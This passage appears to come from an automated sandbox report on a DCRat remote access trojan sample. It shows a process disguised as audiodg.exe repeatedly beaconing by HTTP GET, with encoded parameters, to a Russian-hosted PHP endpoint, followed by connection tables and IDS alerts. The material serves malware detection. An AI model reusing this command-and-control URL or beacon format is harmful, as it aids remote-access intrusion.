zajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiIxMTYidTN0UDZkFWYlFTYhRGZzkTYzIWY3IWMwYmMmFWMiNzYjNDOwIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 104 b | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&4a86d9030c2892e02704803188729bd1=d1nI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJxmWYFGMOdVUp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSpRVavpWS0ZkMZlmVyYles1WSzl0UXl2bqlEb1IjYvJ0MilnTXFmTOhVYpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMRl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxIVa3lWSPpUaPlGNXFGdSdVU6xWbJNXSplkNJlnUCJFbJNXSDRGcKVUSwkFRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiBHetNGbKBDTsJ0MilnVYJVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzl0UlVnRXJWeWJjUnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUarpmT3FlaMpXRExkMrRVTxQTaNFTSp9UaNJjYzp0QMlWVFJVavpWS1oESkVnVzImaKNETpRzVhNnSYp1QCNkW1Z0RUl2bqlUd5cVYuZVbjl2dplUdsdkY5ZVbRl2bqlUNShVYqp0QMlWSq5UdZR0T1lleOhHN51UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiIxMTYidTN0UDZkFWYlFTYhRGZzkTYzIWY3IWMwYmMmFWMiNzYjNDOwIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 104 b | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&4a86d9030c2892e02704803188729bd1=d1nI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJxmWYFGMOdVUp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSpRVavpWS0ZkMZlmVyYles1WSzl0UXl2bqlEb1IjYvJ0MilnTXFmTOhVYpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMRl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxIVa3lWSPpUaPlGNXFGdSdVU6xWbJNXSplkNJlnUCJFbJNXSDRGcKVUSwkFRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiBHetNGbKBDTsJ0MilnVYJVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzl0UlVnRXJWeWJjUnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUarpmT3FlaMpXRExkMrRVTxQTaNFTSp9UaNJjYzp0QMlWVFJVavpWS1oESkVnVzImaKNETpRzVhNnSYp1QCNkW1Z0RUl2bqlUd5cVYuZVbjl2dplUdsdkY5ZVbRl2bqlUNShVYqp0QMlWSq5UdZR0T1lleOhHN51UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiIxMTYidTN0UDZkFWYlFTYhRGZzkTYzIWY3IWMwYmMmFWMiNzYjNDOwIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 104 b | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&4a86d9030c2892e02704803188729bd1=d1nI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJxmWYFGMOdVUp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSpRVavpWS0ZkMZlmVyYles1WSzl0UXl2bqlEb1IjYvJ0MilnTXFmTOhVYpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMRl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxIVa3lWSPpUaPlGNXFGdSdVU6xWbJNXSplkNJlnUCJFbJNXSDRGcKVUSwkFRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiBHetNGbKBDTsJ0MilnVYJVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzl0UlVnRXJWeWJjUnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUarpmT3FlaMpXRExkMrRVTxQTaNFTSp9UaNJjYzp0QMlWVFJVavpWS1oESkVnVzImaKNETpRzVhNnSYp1QCNkW1Z0RUl2bqlUd5cVYuZVbjl2dplUdsdkY5ZVbRl2bqlUNShVYqp0QMlWSq5UdZR0T1lleOhHN51UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiIxMTYidTN0UDZkFWYlFTYhRGZzkTYzIWY3IWMwYmMmFWMiNzYjNDOwIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 104 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1956 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
324 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2580 | audiodg.exe | 141.8.192.58:80 | a0890495.xsph.ru | Sprinthost.ru LLC | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
a0890495.xsph.ru |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
324 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain |
2580 | audiodg.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |